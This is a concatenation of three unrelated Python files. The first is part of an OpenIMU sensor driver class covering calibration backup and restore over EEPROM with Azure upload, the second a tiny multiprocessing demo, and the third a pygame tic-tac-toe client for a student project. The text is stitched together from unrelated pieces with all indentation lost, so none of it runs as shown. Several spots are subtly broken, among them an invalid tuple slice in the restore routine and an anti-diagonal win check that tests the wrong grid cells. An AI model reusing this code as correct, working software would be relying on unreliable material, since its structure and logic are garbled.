@with_device_message
def save_config(self, *args): # pylint: disable=unused-argument
'''
Save configuration
'''
command_line = helper.build_input_packet('sC')
result = yield self._message_center.build(command=command_line)
data = result['data']
error = result['error']
if data:
yield {
'packetType': 'success',
'data': data
}
yield {
'packetType': 'success',
'data': error
}
@with_device_message
def run_command(self, params, *args):
''' run raw command
'''
bytes_str_in_array = re.findall('([a-f|0-9|A-F]{2})', params)
command_line = bytes([int(item, 16) for item in bytes_str_in_array])
result = yield self._message_center.build(command=command_line, timeout=2)
error = result['error']
raw = result['raw']
if error:
yield {
'packetType': 'error',
'data': {
'error': 'Runtime Error',
'message': 'The device cannot response the command'
}
}
yield {
'packetType': 'success',
'data': raw
}
def mag_align_start(self, *args): # pylint: disable=unused-argument
'''
Start mag align action
'''
if not self.is_mag_align:
self.is_mag_align = True
thread = threading.Thread(
target=self.thread_do_mag_align, args=())
thread.start()
return {
'packetType': 'success'
}
@with_device_message
def thread_do_mag_align(self):
'''
Do mag align
'''
try:
command_line = helper.build_input_packet(
'ma', self.properties, 'start')
# self.communicator.write(command_line)
# result = self.get_input_result('ma', timeout=3)
result = yield self._message_center.build(command=command_line, timeout=3)
time.sleep(1)
has_result = False
while not has_result:
command_line = helper.build_input_packet(
'ma', self.properties, 'status')
result = yield self._message_center.build(command=command_line)
if not self.is_mag_align:
break
if result['data'] == [0]:
has_result = True
else:
time.sleep(0.5)
if not has_result:
return
command_line = helper.build_input_packet(
'ma', self.properties, 'stored')
result = yield self._message_center.build(command=command_line)
mag_value = dict()
if len(result['data']) > 0:
decoded_status = binascii.hexlify(bytes(result['data']))
mag_value = self.decode_mag_align_output(decoded_status)
else:
command_line = helper.build_input_packet(
'ma', self.properties, 'abort')
self.is_mag_align = False
# TODO: reset packet rate after operation successful
self.add_output_packet('stream', 'mag_status', {
'status': 'complete',
'value': mag_value
})
except Exception as ex: # pylint: disable=broad-except
APP_CONTEXT.get_logger().error(ex)
self.is_mag_align = False
self.add_output_packet('stream', 'mag_status', {
'status': 'error'
})
@with_device_message
def mag_align_abort(self, *args): # pylint: disable=invalid-name
'''
Abort mag align action
'''
self.is_mag_align = False
time.sleep(0.5)
command_line = helper.build_input_packet(
'ma', self.properties, 'abort')
result = yield self._message_center.build(command=command_line)
# print('mag abort result', result['data'])
if result['error']:
yield {
'packetType': 'error',
'data': {
'error': 1
}
}
else:
yield {
'packetType': 'success'
}
@with_device_message
def mag_align_save(self, *args): # pylint: disable=invalid-name
'''
Save mag align resut
'''
command_line = helper.build_input_packet(
'ma', self.properties, 'save')
# self.communicator.write(command_line)
# result = self.get_input_result('ma', timeout=1)
result = yield self._message_center.build(command=command_line)
if result['error']:
yield {
'packetType': 'error',
'data': {
'error': 1
}
}
yield {
'packetType': 'success'
}
def decode_mag_align_output(self, value):
'''
decode mag align output
'''
hard_iron_x = dict()
hard_iron_y = dict()
soft_iron_ratio = dict()
soft_iron_angle = dict()
hard_iron_x['paramId'] = next(
(item['paramId'] for item in self.properties['userConfiguration']
if item.__contains__('argument') and item['argument'] == 'hard_iron_x'), None)
hard_iron_x['value'] = self.hard_iron_cal(value[16:20], 'axis')
hard_iron_x['name'] = 'Hard Iron X'
hard_iron_x['argument'] = 'hard_iron_x'
hard_iron_y['paramId'] = next(
(item['paramId'] for item in self.properties['userConfiguration']
if item.__contains__('argument') and item['argument'] == 'hard_iron_y'), None)
hard_iron_y['value'] = self.hard_iron_cal(value[20:24], 'axis')
hard_iron_y['name'] = 'Hard Iron Y'
hard_iron_y['argument'] = 'hard_iron_y'
soft_iron_ratio['paramId'] = next(
(item['paramId'] for item in self.properties['userConfiguration']
if item.__contains__('argument') and item['argument'] == 'soft_iron_ratio'), None)
soft_iron_ratio['value'] = self.hard_iron_cal(value[24:28], 'ratio')
soft_iron_ratio['name'] = 'Soft Iron Ratio'
soft_iron_ratio['argument'] = 'soft_iron_ratio'
soft_iron_angle['paramId'] = next(
(item['paramId'] for item in self.properties['userConfiguration']
if item.__contains__('argument') and item['argument'] == 'soft_iron_angle'), None)
soft_iron_angle['value'] = self.hard_iron_cal(value[28:32], 'angle')
soft_iron_angle['name'] = 'Soft Iron Angle'
soft_iron_angle['argument'] = 'soft_iron_angle'
output = [hard_iron_x, hard_iron_y, soft_iron_ratio, soft_iron_angle]
return output
def hard_iron_cal(self, value, data_type):
'''
convert hard iron value
'''
decoded_value = int(value, 16)
# print (decodedValue)
if data_type == 'axis':
if decoded_value > 2 ** 15:
new_decoded_value = (decoded_value - 2 ** 16)
return new_decoded_value / float(2 ** 15) * 8
else:
return decoded_value / float(2 ** 15) * 8
if data_type == 'ratio':
return decoded_value / float(2 ** 16 - 1)
if data_type == 'angle':
if decoded_value > 2 ** 15:
decoded_value = decoded_value - 2 ** 16
pi_value = 2 ** 15 / math.pi
return decoded_value / pi_value
pi_value = 2 ** 15 / math.pi
return decoded_value / pi_value
def upgrade_framework(self, file, *args): # pylint: disable=invalid-name
'''
upgrade framework
'''
# start a thread to do upgrade
if not self.is_upgrading:
self.is_upgrading = True
self._message_center.pause()
if self._logger is not None:
self._logger.stop_user_log()
thead = threading.Thread(
target=self.thread_do_upgrade_framework, args=(file,))
thead.start()
print("Upgrade OpenIMU firmware started at:[{0}].".format(
datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
return {
'packetType': 'success'
}
def backup_calibration(self, params):
'''
start a thread to backup
'''
if not self.is_backup:
self.is_backup = True
self.ans_platform.set_access_token(params['token'])
thread = threading.Thread(
target=self.thread_do_backup, args=())
thread.start()
return {
'packetType': 'success'
}
def restore_calibration(self, params):
'''
start a thread to restore
'''
# if not self.is_restore:
# self.is_restore = True
# self.ans_platform.set_access_token(params['token'])
# thread = threading.Thread(
# target=self.thread_do_restore, args=())
# thread.start()
return {
'packetType': 'success'
}
@with_device_message
def thread_do_backup(self):
'''
Do Calibration Backup
'''
# get current odr
packet_rate_param_index = 4
command_line = helper.build_input_packet(
'gP', properties=self.properties, param=packet_rate_param_index)
packet_rate_result = yield self._message_center.build(command=command_line)
if packet_rate_result['error']:
self.is_backup = False
self.add_output_packet('stream', 'backup_status', {
'status': 'fail'
})
return
# set quiet
command_line = helper.build_input_packet(
'uP', properties=self.properties, param=packet_rate_param_index, value=0)
result = yield self._message_center.build(command=command_line)
if packet_rate_result['error']:
self.is_backup = False
self.add_output_packet('stream', 'backup_status', {
'status': 'fail'
})
return
file_name = self.device_info['sn']+'.bin' # todo: sn-yyyy-mm-dd-hhmmss
start = 0x0
read_size = 0x7E
max_length = 4096
file_write_size = 0
file_result = bytearray()
while file_write_size < max_length:
actual_read_size = read_size
plan_file_write_size = file_write_size + actual_read_size
if plan_file_write_size >= max_length:
actual_read_size = max_length - file_write_size
command_line = helper.build_read_eeprom_input_packet(
start, actual_read_size)
result = yield self._message_center.build(command=command_line)
if result['error']:
self.is_backup = False
self.add_output_packet('stream', 'backup_status', {
'status': 'fail'
})
break
data = result['data']
if plan_file_write_size >= max_length:
file_result.extend(data[0:actual_read_size])
else:
file_result.extend(data)
file_write_size += len(data)
start += actual_read_size
reserved_data = self._reserve_by_word(file_result)
self._write_to_file(file_name, reserved_data)
# restore odr
command_line = helper.build_input_packet(
'uP', properties=self.properties,
param=packet_rate_param_index,
value=packet_rate_result['data']['value'])
yield self._message_center.build(command=command_line)
def _reserve_by_word(self, data):
start_index = 0x284
reserved_data = bytearray()
reserved_data.extend([00, 00]) # append 16 bit count of erases
reserved_data.extend(data[0:start_index])
need_reserve = data[start_index:]
total_len = int((4095 - start_index)/2)
for i in range(total_len):
reserved_data.extend([need_reserve[i*2+1], need_reserve[i*2]])
return reserved_data
def _write_to_file(self, file_name, result):
# save to local path, backup/{device_type}/{file_name}
executor_path = resource.get_executor_path()
backup_folder_path = os.path.join(
executor_path, 'backup', 'openimu')
file_path = os.path.join(backup_folder_path, file_name)
if not os.path.isdir(backup_folder_path):
os.makedirs(backup_folder_path)
with open(file_path, 'wb') as file_stream:
file_stream.write(result)
stream = 'stream'
backup_status = 'backup_status'
status_complete = 'complete'
status_fail = 'fail'
try:
config = get_config()
account_name = config.AZURE_STORAGE_ACCOUNT
container_name = config.AZURE_STORAGE_BACKUP_CONTAINER
sas_token = self.ans_platform.get_sas_token()
if sas_token == '':
raise Exception('cannot get sas token')
self.block_blob_service = BlockBlobService(account_name=account_name,
sas_token=sas_token,
protocol='http')
self.block_blob_service.create_blob_from_path(container_name=container_name,
blob_name=file_name,
file_path=file_path)
except Exception as ex:
print('azure exception', ex)
self.is_backup = False
self.add_output_packet(stream, backup_status, {
'status': status_fail
})
return
# save to db
serial_num = self.device_info['sn']
save_result = self.ans_platform.save_backup_restult(
serial_num, file_name, 'IMU')
if save_result.__contains__('error'):
self.is_backup = False
self.add_output_packet(stream, backup_status, {
'status': status_fail
})
return
self.is_backup = False
self.add_output_packet(stream, backup_status, {
'status': status_complete,
'date': save_result['data']['lastBackupTime']
})
@with_device_message
def _unlock(self):
command_line = helper.build_read_eeprom_input_packet(0x100, 2)
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
self._restore_fail()
return
command_line = helper.build_unlock_eeprom_packet(result['data'])
unlock_result = yield self._message_center.build(command=command_line, timeout=2)
if unlock_result['error']:
self._restore_fail()
return
print('unlock -- successfull', unlock_result['data'])
@with_device_message
def thread_do_restore(self):
'''
Do Calibration Restore
'''
# 1.download bin from azure
file_name = self.device_info['sn']+'.bin'
content_data = bytearray()
executor_path = resource.get_executor_path()
backup_folder_path = os.path.join(
executor_path, 'backup', 'openimu')
file_path = os.path.join(backup_folder_path, file_name)
file = open(file_path, 'rb')
content_data = file.read()
file.close()
# 2.save odr, then set quiet
# get current odr
packet_rate_param_index = 4
command_line = helper.build_input_packet(
'gP', properties=self.properties, param=packet_rate_param_index)
packet_rate_result = yield self._message_center.build(command=command_line)
if packet_rate_result['error']:
self._restore_fail()
return
# set quiet
command_line = helper.build_input_packet(
'uP', properties=self.properties, param=packet_rate_param_index, value=0)
result = yield self._message_center.build(command=command_line)
if result['error']:
self._restore_fail()
return
# 3.do restore
# 3.1 unlock eeprom
command_line = helper.build_read_eeprom_input_packet(0x100, 2)
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
self._restore_fail()
return
command_line = helper.build_unlock_eeprom_packet(result['data'])
unlock_result = yield self._message_center.build(command=command_line, timeout=2)
if unlock_result['error']:
self._restore_fail()
return
print('unlock -- successfull', unlock_result['data'])
# 3.2 write eeprom
skip_range = [0x200, 0x284]
sn_string = self._build_sn_string(content_data[0x200, 0x204])
model_string = self._build_model_string(content_data[0x204:0x284])
can_write = self._clear_calibration_area()
if not can_write:
self._restore_fail()
return
can_write = self._write_calibration_from_data(content_data, skip_range)
if not can_write:
self._restore_fail()
return
can_write = self._write_sn_and_model_string(sn_string, model_string)
if not can_write:
self._restore_fail()
return
print('write eeporm -- successfull')
self._lock()
# 4.write operation result to db
# 5.restore odr
command_line = helper.build_input_packet(
'uP', properties=self.properties,
param=packet_rate_param_index,
value=packet_rate_result['data']['value'])
yield self._message_center.build(command=command_line)
self.is_restore = False
self.add_output_packet('stream', 'restore_status', {
'status': 'success'
})
def _build_sn_string(self, data_range):
data = []
start = 0
for _ in range(2):
if start == 4:
break
data.extend([
struct.unpack('B', data_range[start+1: start+2])[0],
struct.unpack('B', data_range[start: start+1])[0]
])
start += 2
return data
def _build_model_string(self, data_range):
end = [0]
data = []
for item in data_range:
if item == 0:
break
data.append(item)
data.extend(end)
return data
@with_device_message
def _clear_calibration_area(self):
start = 0
end = 4096
block_size = 20
write_offset = 0
while write_offset < end:
write_data = []
plan_write_offset = write_offset + block_size * 2
if plan_write_offset >= end:
plan_write_offset = end
block_size = int((plan_write_offset - write_offset)/2)
for _ in range(plan_write_offset - write_offset):
write_data.append(0xFF)
command_line = helper.build_write_eeprom_input_packet(
start, block_size, write_data)
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
yield False
write_offset = plan_write_offset
start += block_size
yield True
@with_device_message
def _write_sn_and_model_string(self, sn_string, model_string):
command_line = helper.build_write_eeprom_input_packet(
0x100, 2, sn_string)
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
yield False
command_line = helper.build_write_eeprom_input_packet(
0x104, len(model_string), self._build_16bit_data_range(model_string))
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
yield False
yield True
@with_device_message
def _write_calibration_from_data(self, data, skip_range):
end = 4096
block_size = 20
write_offset = 0
while write_offset < end:
plan_write_offset = write_offset + block_size * 2
if plan_write_offset >= end:
plan_write_offset = end
block_size = int((plan_write_offset - write_offset)/2)
# plan write range
plan_write_range = [write_offset, plan_write_offset]
# build a new range with skip range
new_range = self._build_calibration_write_range(
data, plan_write_range, skip_range)
for write_range in new_range:
command_line = helper.build_write_eeprom_input_packet(
int(write_range['start']/2),
int(write_range['length']/2),
write_range['data'])
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
yield False
yield True
def _build_calibration_write_range(self, content_data, plan_write_range, skip_range):
# range struct {'start': start, 'data': data, 'length': length}
new_range = []
write_data = []
if plan_write_range[1] >= skip_range[0] and plan_write_range[1] <= skip_range[1]:
if plan_write_range[0] < skip_range[0]:
write_data.extend(
content_data[plan_write_range[0]: skip_range[0]])
new_range.append({'start': int(plan_write_range[0]/2),
'length': int((skip_range[0]-plan_write_range[0])/2),
'data': write_data})
if plan_write_range[0] >= skip_range[0] and plan_write_range[0] <= skip_range[1]:
if plan_write_range[1] > skip_range[1]:
write_data.extend(
content_data[skip_range[1]: plan_write_range[1]])
new_range.append({'start': int(skip_range[1]/2),
'length': int((plan_write_range[1] - skip_range[1])/2),
'data': write_data})
if plan_write_range[0] < skip_range[0] and skip_range[1] < plan_write_range[1]:
new_range.append({'start': int(plan_write_range[0]/2),
'length': int((skip_range[0] - plan_write_range[0])/2),
'data': content_data[plan_write_range[0]: skip_range[0]]})
new_range.append({'start': int(skip_range[1]/2),
'length': int((plan_write_range[1] - skip_range[1])/2),
'data': content_data[skip_range[1]: plan_write_range[1]]})
if plan_write_range[1] < skip_range[0] or plan_write_range[0] > skip_range[1]:
write_data.extend(
content_data[plan_write_range[0]: plan_write_range[1]])
new_range.append({'start': int(plan_write_range[0]/2),
'length': int((plan_write_range[1] - plan_write_range[0])/2),
'data': write_data})
return new_range
def _build_16bit_data_range(self, data_range):
data = []
for item in data_range:
data.extend(struct.pack('>H', item))
return data
def _build_reserve_data(self, data_range):
data = []
start = 0
for _ in range(int(len(data_range)/2)):
if start == len(data_range):
break
data.extend([
struct.unpack('B', data_range[start+1: start+2])[0],
struct.unpack('B', data_range[start: start+1])[0]
])
start += 2
return data
@with_device_message
def _lock(self):
# lock eeprom
command_line = helper.build_input_packet('LE')
result = yield self._message_center.build(command=command_line)
if result['error']:
self._restore_fail()
return
print('lock eeporm -- successfull', result['data'])
# software reset
command_line = helper.build_input_packet('SR')
yield self._message_center.build(command=command_line)
def _restore_fail(self):
self.is_restore = False
self.add_output_packet('stream', 'restore_status', {
'status': 'fail'
})
|
myfork.py
|
import time
from multiprocessing import Process
def f(name):
print('hello', name)
print('我是子进程')
if __name__ == '__main__':
p = Process(target=f, args=('bob',))
p.start()
time.sleep(15)
print('执行主进程的内容了')
|
tttclient.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 10 14:19:06 2020
This Tic-tac-toe Games is COMP-2100 Group 1 Final Project
Submitted to Prof. Othman, Salem
@author: Boonpeng, Pikulkaew (Pk)
@author: DiMarzio, Ariane
@author: Sajjad, Tania
This project uses PyGame for creating GUI
There are 2 types of games
1. Traditional Tic-tac-toe (X and O players)
- A row, a column, or a diagonal line must have the same sign.
2. Sum-of-15 Tic-tac-toe (Even number and Odd number players)
- The last player who makes a row, a column, or a diagonal line has the
sum of 15 will be the winner.
- Odd number player always goes first: 1, 3, 5, 7, 9
- Even number player: 2, 4, 6, 8
"""
import pygame
pygame.init()
#window width
windowWidth = 1200
#window height
windowHeight = 600
#sets window dimension
screen = pygame.display.set_mode((windowWidth, windowHeight))
#set window's title
pygame.display.set_caption('COMP-2100-09 Final Project Group 1: Tic-tac-toe Client')
#-----------------------------------------------------------------------------
#colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 138, 138)
#-----------------------------------------------------------------------------
#font setting for "select" text
selectText = pygame.font.Font(pygame.font.get_default_font(), 24)
#font for buttons
btnText = pygame.font.Font(pygame.font.get_default_font(), 40)
#stores game option; 1 for XO , 2 for number
gameOption = 0;
#stores player option; 1 for 1 player(not available), 2 for 2 players
playerOption = 0
#stores player 1's score
score1 = 0
#stores player 2's score
score2 = 0
#player 1 is X or Odd
player1 = ""
#player 2 is O or Even
player2 = ""
#global variables used when sending and receiving data from other user
playing= True
turn=True
numOfImg = 1
tradiCurrPlayer= 'x'
#grid setting for X and O
gridTradi = [[None]*3, [None]*3, [None]*3]
gridImg = pygame.image.load(r"assets\grid.png")
row = 0
col = 0
#gris setting for Odd and Even
gridNum = [0, 0, 0, 0, 0, 0, 0, 0, 0]
# 1 | 2 | 3
#---+---+---
# 4 | 5 | 6
#---+---+---
# 7 | 8 | 9
cell = 0
#------------------------------------------------------------------
gridImg = pygame.transform.scale(gridImg, (480,430))
#X and O game option button image
imgGame1 = pygame.image.load(r"assets\game1.png")
imgGame1 = pygame.transform.scale(imgGame1, (160,160))
#Odd and Even game option button image
imgGame2 = pygame.image.load(r"assets\game2.png")
imgGame2 = pygame.transform.scale(imgGame2, (160,160))
#1 player option button image
imgPlayer1 = pygame.image.load(r"assets\player1.png")
imgPlayer1 = pygame.transform.scale(imgPlayer1, (160,160))
#2 player option button image
imgPlayer2 = pygame.image.load(r"assets\player2.png")
imgPlayer2 = pygame.transform.scale(imgPlayer2, (160,160))
#loads x image
xImg = pygame.image.load(r"assets\x.png")
xImg = pygame.transform.scale(xImg, (80,80))
#loads o image
imgO = pygame.image.load(r"assets\o.png")
imgO = pygame.transform.scale(imgO, (80,80))
#loads winning lines
imgWinHon = pygame.image.load(r"assets\honWinLine.png")
imgWinHon = pygame.transform.scale(imgWinHon, (400,14))
imgWinVer = pygame.image.load(r"assets\verWinLine.png")
imgWinVer = pygame.transform.scale(imgWinVer, (14,400))
imgWinTopLeft = pygame.image.load(r"assets\topLeftWinLine.png")
imgWinTopLeft = pygame.transform.scale(imgWinTopLeft, (390,390))
imgWinTopRight = pygame.image.load(r"assets\topRightWinLine.png")
imgWinTopRight = pygame.transform.scale(imgWinTopRight, (390,390))
import threading
#creates a thread to communicate between users
def createThread(target):
thread=threading.Thread(target=target)
thread.daemon=True
thread.start()
import socket
HOST= '127.0.0.1'
PORT= 1542
#creates socket and socket connection
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
#method to receive data from the other user
def receiveData():
global turn, playing, xImg, score1, gameOption, numOfImg, btnText
#infinite loop for receive any data sent
while True:
data= sock.recv(1024).decode()
print(data)
data=data.split("-")
x,y=int(float(data[0])),int(float(data[1]))
turn=True
if x>585 and x<975 and y>34 and y<415:
#X and O game output for other player's move
if gameOption==1:
screen.blit(xImg, (x, y))
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#num output for other player's move
elif gameOption==2:
imgNum = pygame.image.load('assets\\' + str(numOfImg) + ".png")
imgNum = pygame.transform.scale(imgNum, (80,80))
if x > 585 and x < 715 and y > 35 and y < 155:
cell = 0
elif x > 715 and x <= 850 and y > 35 and y <= 155:
cell = 1
elif x > 850 and x <= 975 and y > 35 and y <= 155:
cell = 2
elif x > 585 and x <= 715 and y > 155 and y <= 300:
cell = 3
elif x > 715 and x <= 850 and y > 155 and y <= 300:
cell = 4
elif x > 850 and x <= 975 and y > 155 and y <= 300:
cell = 5
elif x > 585 and x <= 715 and y > 300 and y <= 415:
cell = 6
elif x > 715 and x <= 850 and y > 300 and y <= 415:
cell = 7
elif x > 850 and x <= 975 and y > 300 and y <= 415:
cell = 8
gridNum[cell]= numOfImg
screen.blit(imgNum, (x, y))
numOfImg+=1
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#checks to see if the other player won
if len(data)==4 :
thirdPlace = int(float(data[2]))
#determines which winning line is being used and prints
if thirdPlace==1.0:
screen.blit(imgWinHon, (x, y))
elif thirdPlace==2.0:
screen.blit(imgWinVer, (x, y))
elif thirdPlace==3.0:
screen.blit(imgWinTopLeft, (x, y))
elif thirdPlace==4.0:
screen.blit(imgWinTopRight, (x, y))
#updates the other player's score since they won
score1+=1
playing=False
#turn update output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Game Over!", True, RED), (60, 525))
pygame.display.update()
#calls the createThread method and passes in receiveData
createThread(receiveData)
#GUI for the game
def gamePage():
global score1, score2, gameOption, screen, btnText, player1, player2, selectText
#Game option header
screen.blit(btnText.render("Games", True, RED), (55,50))
screen.blit(imgGame1, (55, 90))
screen.blit(imgGame2, (215, 90))
screen.blit(btnText.render("Players", True, RED), (55,300))
screen.blit(imgPlayer1, (55, 345))
screen.blit(imgPlayer2, (215, 345))
#score board for player 1
player1Score = pygame.Rect(435, 460, 180, 45)
pygame.draw.rect(screen, RED, player1Score)
#score board for player 2
player2Score = pygame.Rect(435, 515, 180, 45)
pygame.draw.rect(screen, RED, player2Score)
#shows grid image
screen.blit(gridImg, (550, 20))
#if a game option is selected (not zero), player 1's score board will show player 1's score.
#otherwise, it will tell the user to select a game.
if gameOption != 0:
screen.blit(selectText.render("Select Games", True, RED), (443, 470))
screen.blit(btnText.render(player1 + ": " + str(score1), True, BLACK), (455, 465))
else:
screen.blit(btnText.render(player1 + ": " + str(score1), True, RED), (455, 465))
screen.blit(selectText.render("Select Games", True, BLACK), (443, 470))
#if a player option is selected (not zero), player 2's score board will show player 2's score.
#otherwise, it will tell the user to select a number of players.
if playerOption != 0:
screen.blit(selectText.render("Select Players", True, RED), (441, 525))
screen.blit(btnText.render(player2 + ": " + str(score2), True, BLACK), (455, 520))
else:
screen.blit(btnText.render(player2 + ": " + str(score2), True, RED), (455, 520))
screen.blit(selectText.render("Select Players", True, BLACK), (441, 525))
#if gameOption is 1 means X and O
#otherwise, it means odd and even
if gameOption == 1:
player1 = "X"
player2 = "O"
elif gameOption == 2:
player1 = "Even"
player2 = "Odd"
#Again button setting
againBtn = pygame.Rect(655, 460, 130, 100)
pygame.draw.rect(screen, RED, againBtn)
screen.blit(btnText.render("Again", True, BLACK), (663, 490))
#New button setting
newBtn = pygame.Rect(831, 460, 130, 100)
pygame.draw.rect(screen, RED, newBtn)
screen.blit(btnText.render("New", True, BLACK), (855, 490))
#Reset button setting
resetBtn = pygame.Rect(1005, 460, 130, 100)
pygame.draw.rect(screen, RED, resetBtn)
screen.blit(btnText.render("Reset", True, BLACK), (1015, 490))
#keeps track of loop
count=0
#set gameOption and playerOption by checking the ranges of co-ordiantes of each button
def setGameAndPlayerOptions():
global gameOption, playerOption, imgGame1, imgGame2, count
count+=1
x, y = pygame.mouse.get_pos()
if x > 55 and x < 215 and y > 90 and y < 250:
if gameOption == 0:
gameOption = 1
if x > 215 and x < 375 and y > 90 and y < 250:
if gameOption == 0:
gameOption = 2
if x > 55 and x < 215 and y > 345 and y < 505:
if playerOption == 0:
playerOption = 0
if x > 215 and x < 375 and y > 345 and y < 505:
if playerOption == 0:
playerOption = 2
if count==2:
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#sets everything back to the beginning and clear the grid,
#but does not reset the scores nor let the users change game and player options
def clear():
global tradiCurrPlayer, gridTradi, gridNum, gameOption, cell, numOfImg
screen.blit(gridImg, (550, 20))
screen.fill(BLACK)
if gameOption==1:
tradiCurrPlayer = 'x'
for row in range(0,3):
for col in range(0,3):
gridTradi[row][col] = None
else:
cell = 0
numOfImg = 1
gridNum = [0, 0, 0, 0, 0, 0, 0, 0, 0]
#function for Again button
def againBtn():
global turn, playing
x, y = pygame.mouse.get_pos()
if x > 655 and x < 785 and y > 460 and y < 560:
clear()
turn=True
playing= True
sendData= '{}-{}-{}'.format(x,y,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#function for New button. resets the scores
def newBtn():
global score1, score2, turn, playing
x, y = pygame.mouse.get_pos()
if x > 830 and x < 961 and y > 460 and y < 560:
score1 = 0
score2 = 0
screen.blit(gridImg, (550, 20))
screen.fill(BLACK)
clear()
playing=True
turn= True
sendData= '{}-{}-{}'.format(x,y,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#function for Reset button. resets the score and
#the users can change game and player options
def resetBtn():
global gameOption, playerOption, score1, score2, turn, playing, count, numOfImg
x, y = pygame.mouse.get_pos()
if x > 1005 and x < 1135 and y > 460 and y < 560:
score1 = 0
score2 = 0
gameOption = 0
playerOption = 0
numOfImg=1
screen.blit(gridImg, (550, 20))
screen.fill(BLACK)
clear()
turn=True
playing=True
count=0
#----------------------------------------
#| FOR X and O GAME |
#----------------------------------------
#setting where to put X and O on the grid
def tradiDrawOX(row, col):
global tradiCurrPlayer, turn
codY = 0
codX = 0
if row == 1:
codY = 50
if row == 2:
codY = 185
if row == 3:
codY = 320
if col == 1:
codX = 614
if col == 2:
codX = 744
if col == 3:
codX = 879
#the current player is A so draw something and set the next player to be B
tradiCurrPlayer='x'
screen.blit(imgO, (codX, codY))
turn= False
#if a row, column, or diagonal has the same sign, the winning line will be drawn and sent to the other user
def tradiCheckWin():
global turn, playing
win = False
row = 0
if gridTradi[row][0] == gridTradi[row][1] == gridTradi[row][2] and gridTradi[row][0] is not None and gridTradi[row][1] is not None and gridTradi[row][2] is not None:
screen.blit(imgWinHon, (583, 90))
playing=False
sendData= '{}-{}-{}-{}'.format(583,90,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
row = 1
if gridTradi[row][0] == gridTradi[row][1] == gridTradi[row][2] and gridTradi[row][0] is not None and gridTradi[row][1] is not None and gridTradi[row][2] is not None:
screen.blit(imgWinHon, (583, 222))
playing=False
sendData= '{}-{}-{}-{}'.format(583,222,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
row = 2
if gridTradi[row][0] == gridTradi[row][1] == gridTradi[row][2] and gridTradi[row][0] is not None and gridTradi[row][1] is not None and gridTradi[row][2] is not None:
screen.blit(imgWinHon, (583, 354))
playing=False
sendData= '{}-{}-{}-{}'.format(583,354,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
col = 0
if gridTradi[0][col] == gridTradi[1][col] == gridTradi[2][col] and gridTradi[0][col] is not None and gridTradi[1][col] is not None and gridTradi[2][col] is not None:
screen.blit(imgWinVer, (645, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(645,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
col = 1
if gridTradi[0][col] == gridTradi[1][col] == gridTradi[2][col] and gridTradi[0][col] is not None and gridTradi[1][col] is not None and gridTradi[2][col] is not None:
screen.blit(imgWinVer, (775, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(775,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
col = 2
if gridTradi[0][col] == gridTradi[1][col] == gridTradi[2][col] and gridTradi[0][col] is not None and gridTradi[1][col] is not None and gridTradi[2][col] is not None:
screen.blit(imgWinVer, (910, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(910,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if gridTradi[0][0] == gridTradi[1][1] == gridTradi[2][2] and gridTradi[0][0] is not None and gridTradi[1][1] is not None and gridTradi[2][2] is not None:
screen.blit(imgWinTopLeft, (587, 34))
playing=False
sendData= '{}-{}-{}-{}'.format(587, 34,3.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if gridTradi[0][2] == gridTradi[1][1] == gridTradi[2][0] and gridTradi[0][0] is not None and gridTradi[1][1] is not None and gridTradi[2][2] is not None:
screen.blit(imgWinTopRight, (587, 34))
playing=False
sendData= '{}-{}-{}-{}'.format(587, 34, 4.0, playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
return win
